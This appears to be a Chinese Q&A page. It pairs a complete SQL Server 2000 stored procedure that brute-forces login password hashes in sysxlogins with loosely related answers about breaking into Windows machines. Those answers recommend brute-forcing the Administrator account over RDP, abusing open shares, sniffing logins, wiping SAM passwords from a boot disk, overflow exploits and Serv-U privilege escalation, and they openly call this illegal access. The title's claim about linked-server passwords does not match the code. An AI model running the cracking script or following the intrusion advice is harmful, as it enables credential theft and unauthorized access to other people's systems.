如何将SQLServer 2000链接服务器的密码破解为明文
具体操作如下:
if exists (select from dbosysobjects where id = object_id(N'[dbo][p_GetPassword]') and OBJECTPROPERTY(id, N'IsProcedure') = 1)
drop procedure [dbo][p_GetPassword]
GO
/--穷举法破解 SQL Server 用户密码
可以破解中文,特殊字符,字符+尾随空格的密码
为了方便显示特殊字符的密码,在显示结果中,显示了组成密码的ASCII,理论上可以破解任意位数的密码,条件是电脑配置足够,时间足够
/--调用示例
exec p_GetPassword
--/
create proc p_GetPassword
@username sysname=null, --用户名,如果不指定,则列出所有用户
@pwdlen int=2 --要破解的密码的位数,默认是2位及以下的
as
set @pwdlen=case when isnull(@pwdlen,0)<1 then 1 else @pwdlen-1 end
select top 255 id=identity(int,0,1) into #t from syscolumns
alter table #t add constraint pk_#t primary key(id)
select name,password
,type=case when xstatus&2048=2048 then 1 else 0 end
,jm=case when password is null then 1 else 0 end
,pwdstr=cast('' as sysname)
,pwd=cast('' as varchar(8000))
into #pwd
from masterdbosysxlogins a
where srvid is null
and name=isnull(@username,name)
declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000)
declare @l int
select @l=0
,@s1='char(aaid)'
,@s2='cast(aaid as varchar)'
,@s3=',#t aa'
exec('
update pwd set jm=1,pwdstr='+@s1+'
,pwd='+@s2+'
from #pwd pwd'+@s3+'
where pwdjm=0
and pwdcompare('+@s1+',pwdpassword,pwdtype)=1
')
while exists(select 1 from #pwd where jm=0 and @l<@pwdlen)
begin
select @l=@l+1
,@s1=@s1+'+char('+char(@l/26+97)+char(@l%26+97)+'id)'
,@s2=@s2+'+'',''+cast('+char(@l/26+97)+char(@l%26+97)+'id as varchar)'
,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97)
exec('
update pwd set jm=1,pwdstr='+@s1+'
,pwd='+@s2+'
from #pwd pwd'+@s3+'
where pwdjm=0
and pwdcompare('+@s1+',pwdpassword,pwdtype)=1
')
end
select 用户名=name,密码=pwdstr,密码ASCII=pwd
from #pwd
go
没怎么明白你的意思
是要登录上局域网网关,然后再网关上运行程序吗?
如果是正常用户直接远程登录就行了
非法访问的话可以用流光等暴力破解密码,用户反正就是ADMINISTRATOR,总破的了
但如果对方有一些安全软件,你的远程连接会被记录下来,甚至会强行断掉你的连接
危险性很高,自己决定
还有种办法是寻找共享,如果管理员大意点共享开了,又没什么限制,可以利用下共享
WINDOWS的用户密码,按照7位HASH数列加密
只有正向的和加密的密码部分进行匹配,但还做不到逆向推算密码。也就是说,只有暴力破解。
而目前WINDOWS安全策略,一般都是输入3-5次错误密码就锁账号的。你用暴力破解,很可能造成一次DOS攻击行为,达到的效果只有一个,冻结合法用户,而不是破解密码。除非运气好,1,2,3次就给你碰上弱密码或空密码。而合格的管理员,会用组策略避免弱密码的存在的,对密码长度,复杂度都会有限制。
或许你可以用网络监听的方法,监听到登陆时,用户送出的明文报文,但如果是用了PPTP等加密的报文,那又是一道难题了。
用PE清楚,你确认操作正确吗。我不知道你的那个密码清除工具的方法,我给你介绍下我的密码清楚工具的用法,我的是进入dos,然后选择用破解账号所在的盘符,一般是在C盘,它会自动查找sam文件,接着选择破除的用户名,破解完密码为空,你按照上面的提示操作下。还可以进入PE桌面,在程序里可以看到一个破解的,
暴力破解这个太麻烦,我重来不做暴力破解这个工作。你要做我没办法,要开有3389的端口机器,你可以利用暴力破解软件破解。不过建议你弄清楚这个机器有些什么程序,(我想你可能是内部管理员吧,这个应该知道)。利用溢出攻击,进行益出,当然要没有打相应的补丁才行。
益处方式很多,比如:sql溢出等。
还有如果你用的是serv_u的话你可以利用FTP提权工具进行提权,重建用户密码!
0条评论